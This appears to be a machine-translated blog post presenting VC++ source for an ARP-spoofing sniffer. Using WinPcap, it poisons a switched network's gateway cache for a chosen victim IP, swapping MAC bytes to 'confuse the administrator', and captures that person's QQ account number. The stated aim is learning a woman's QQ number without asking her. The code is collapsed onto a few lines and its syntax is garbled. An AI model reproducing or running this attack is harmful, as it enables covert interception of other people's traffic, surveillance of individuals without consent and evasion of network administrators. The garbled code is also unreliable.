VC ++ implements qq id sniffing for the Exchange Network

 

When we are in an exchange network, it is very painful to know others' QQ numbers. If a plmm is surfing the internet, but you do not know that she has no courage to ask QQ, this is a pity,

For programming, we can use the switch's data exchange to sniff out the QQ number, because only the QQ number in the QQ data is not encrypted.

# Include "stdafx. H "# include" pcap. H "# include <stdio. h> # include "iphlpapi. H "# include" protocol. H "# pragma comment (Lib," wpcap. lib ") # pragma comment (Lib," iphlpapi. lib ") # pragma comment (Lib," wsock32.lib ") # define comment 1 DWORD dwmyip, dwgateip, dwsubnet, dwdstip; uchar umymac [6], ugatemac [6], udstmac [6]; pcap_t * adhandle; int ncount = 0; // It is used to perform three operations to obtain the gateway Mac: bool bgatemac = true; bool bdstmac = true; Void sendarprequest (DWORD dwdesip, DWORD dwsrcip, uchar usrcmac []); int sendpacket (char * pbuffer, int nlen);/* each time a packet is captured, libpcap will automatically call this callback function */void packet_handler (u_char * Param, const struct pcap_pkthdr * Header, const u_char * pkt_data) {etheader * pethdr = (etheader *) pkt_data; if (ntohs (pethdr-> type) = eth_type_arp) {If (header-> Len <sizeof (arppacket) return; arpheader * parphdr = (arpheader *) (char *) Pkt_data + sizeof (etheader); If (ntohs (parphdr-> opcode) = arpop_reply) {If (parphdr-> daddr = dwmyip & parphdr-> saddr = dwgateip & bgatemac) {If (ncount = 0) {memcpy (ugatemac, parphdr-> SMAC, 6); ncount ++;} else if (ncount = 3) // obtain the gateway Mac {bgatemac = false; return;} else {If (! Memcmp (ugatemac, parphdr-> SMAC, 6) {ncount ++;} else {ncount = 0 ;}} sendarprequest (dww.ip, dwmyip, umymac );} if (parphdr-> daddr = dwmyip & parphdr-> saddr = dwdstip & bdstmac) {memcpy (udstmac, parphdr-> SMAC, 6 ); bdstmac = false ;}}if (ntohs (pethdr-> type) = eth_type_ip) {ipheader * piphdr = (ipheader *) (char *) pkt_data + sizeof (etheader); If (piphdr-> protocol = protocol_udp) {If (header-> Len <sizeof (etheader) + Sizeof (ipheader) + sizeof (udpheader) return; udpheader * pudphdr = (udpheader *) (char *) piphdr + sizeof (ipheader )); if (ntohs (pudphdr-> srcport) = 8000) {qqheader * pqqhdr = (qqheader *) (char *) pudphdr + sizeof (udpheader )); if (pqqhdr-> flag! = 0x02) return; // It is not a QQ data packet uchar uqq [4]; memcpy (uqq, pqqhdr-> data, 4); DWORD dwqq = 0; for (INT I = 0; I <4; I ++) {dwqq = dwqq * 256 + uqq [I];} printf ("find the QQ number of IP: % s: % u \ n ", inet_ntoa (* (in_addr *) & piphdr-> dstaddr), dwqq );}} if (piphdr-> dstaddr = dwdstip & memcmp (pethdr-> dhost, udstmac, 6) // the destination IP address is the IP address to be sniffed, however, the target Mac is not the target Mac {pethdr-> shost [5] ++; // The source MAC cannot be set as the gateway MAC; otherwise, switch spoofing occurs, thus, other hosts cannot access memcpy (pethdr-> dhost, udstmac, 6); sendpacket (char *) P Kt_data, header-> Len) ;}} int sendpacket (char * pbuffer, int nlen) {If (pcap_sendpacket (adhandle, (uchar *) pbuffer, nlen) return 0; return 1;} void sendarprequest (DWORD dwdesip, DWORD dwsrcip, uchar usrcmac []) {arppacket * parppacket = new arppacket; For (INT I = 0; I <6; I ++) parppacket-> Eth. dhost [I] = 0xff; memcpy (parppacket-> Eth. shost, usrcmac, 6); parppacket-> Eth. type = ntohs (eth_type_arp); parppacket-> arp. HRD = NT OHS (arphrd_ether); parppacket-> arp. eth_type = ntohs (eth_type_ip); parppacket-> arp. maclen = 6; parppacket-> arp. iplen = 4; parppacket-> arp. opcode = ntohs (arpop_request); memcpy (parppacket-> arp. SMAC, usrcmac, 6); parppacket-> arp. saddr = dwsrcip; memset (parppacket-> arp. DMAc, 0, 6); parppacket-> arp. daddr = dwdesip; sendpacket (char *) parppacket, sizeof (arppacket); Delete parppacket;} void sendarpreply (DWORD dwdesip, d Word dwsrcip, uchar udesmac [], uchar usrcmac []) {arppacket * parppacket = new arppacket; memcpy (parppacket-> Eth. dhost, udesmac, 6); memcpy (parppacket-> Eth. shost, usrcmac, 6); parppacket-> Eth. type = ntohs (eth_type_arp); parppacket-> arp. HRD = ntohs (arphrd_ether); parppacket-> arp. eth_type = ntohs (eth_type_ip); parppacket-> arp. maclen = 6; parppacket-> arp. iplen = 4; parppacket-> arp. opcode = ntohs (arpop_reply); memcpy (Parppacket-> arp. SMAC, usrcmac, 6); parppacket-> arp. saddr = dwsrcip; memcpy (parppacket-> arp. DMAc, udesmac, 6); parppacket-> arp. daddr = dwdesip; sendpacket (char *) parppacket, sizeof (arppacket); Delete parppacket;} int winapi mythread (lpvoid PARAM) {// sleep (100 ); sendarprequest (dww.ip, dwmyip, umymac); While (1) {If (bw.mac) {: Sleep (100); continue;} break;} printf ("the gateway Mac is: % 02x-% 02x-% 02x-% 02x-% 02x-% 02x \ n ", ugatemac [0], Ugatemac [1], ugatemac [2], ugatemac [3], ugatemac [4], ugatemac [5]); printf ("Enter the IP address to sniff :"); char IP [20]; scanf ("% s", ip); dwdstip = inet_addr (IP); sendarprequest (dwdstip, dwmyip, umymac); While (1) {If (bdstmac) {: Sleep (100); continue;} break;} printf ("the target Mac is: % 02x-% 02x-% 02x-% 02x-% 02x-% 02x \ n ", udstmac [0], udstmac [1], udstmac [2], udstmac [3], udstmac [4], udstmac [5]); printf ("input number of spoofing packets per second: 1-50 \ n"); int nspeed; scanf ("% d", & nspeed ); Uchar UMAC [6]; UMAC [0] = udstmac [0]; UMAC [1] = udstmac [1]; UMAC [2] = udstmac [3]; UMAC [3] = udstmac [2]; // swap the third and fourth bytes of the Mac, confuse the Administrator UMAC [4] = udstmac [4]; UMAC [5] = udstmac [5]; while (1) {sendarpreply (dww.ip, inet_addr (IP), ugatemac, UMAC); sleep (1000/nspeed );} return 0;} int getnetconfig (DWORD dwip) {pip_adapter_info padapterinfo = NULL; ulong ullen = 0; // apply for memory for the adapter structure: getadaptersinfo (padapterinfo, & ullen); padapterinfo = (Pip_adapter_info): globalalloc (gptr, ullen); // obtain the local adapter structure information if (: getadaptersinfo (padapterinfo, & ullen) = error_success) {While (padapterinfo! = NULL) {If (dwip = inet_addr (padapterinfo-> ipaddresslist. IPaddress. string) {dwmyip = dwip; memcpy (umymac, padapterinfo-> address, 6); dwsubnet = inet_addr (padapterinfo-> ipaddresslist. ipmask. string); dwateip = inet_addr (padapterinfo-> gatewaylist. IPaddress. string); // cether: setgatewayaddr (inet_addr (padapterinfo-> gatewaylist. IPaddress. string), ""); printf ("local IP Address: % s \ n local Mac: % 02x-% 02x-% 02x-% 02x-% 02x-% 02x \ n Gateway IP Address: % s \ n ", padapterinfo-> ipaddresslist. IPaddress. string, umymac [0], umymac [1], umymac [2], umymac [3], umymac [4], umymac [5], padapterinfo-> gatewaylist. IPaddress. string); return 1;} padapterinfo = padapterinfo-> next;} return 0;} return-1;} int main (INT argc, char * argv []) {pcap_if_t * alldevs; pcap_if_t * D; int I = 0; char errbuf [pcap_errbuf_size];/* retrieve the device list from the local machine */If (pcap_fi Ndalldevs (& alldevs, errbuf) =-1) {printf ("error in pcap_findalldevs_ex: % s \ n", errbuf); exit (1 );} /* print the list */For (D = alldevs; D! = NULL; D = D-> next) {/* print the device's name */printf ("% d. % s ", ++ I, d-> name);/* print the device's dashboard */If (D-> description) {printf (" (% s) \ n ", D-> description);} else {printf (" (no description available) \ n ") ;}} if (I = 0) {printf ("\ Nno interfaces found! Make sure Winpcap is installed. \ n "); Return-1;} printf (" Enter the interface number (1-% d): ", I); int nidx; scanf (" % d ", & nidx); If (nidx <1 | nidx> I) {printf ("\ ninterface number out of range. \ n ");/* release the device list */pcap_freealldevs (alldevs); Return-1;}/* jump to the selected adapter */For (D = alldevs, I = 0; I <nIdx-1; D = D-> next, I ++);/* Open the device */If (adhandle = pcap_open_live (D-> name, // device name 65536, // 65535 ensure that all content of each packet on different data link layers can be captured. pcap_openflag_promiscuous, // mixed mode 10, // read timeout errbuf // Error Buffer Pool )) = NULL) {fprintf (stderr, "\ nunable to open the adapter. % s is not supported by Winpcap \ n ", D-> name);/* release device list */pcap_freealldevs (alldevs); Return-1 ;} printf ("\ nlistening on % s... \ n ", D-> description); getnetconfig (sockaddr_in *) (D-> addresses-> ADDR)-> sin_addr.s_un.s_addr ); /* release the device list */pcap_freealldevs (alldevs);: createthread (null, 0, (lpthread_start_routine) mythread, null,);/* start to capture */pcap_loop (adhandle, 0, packet_handler, null); Return 0 ;}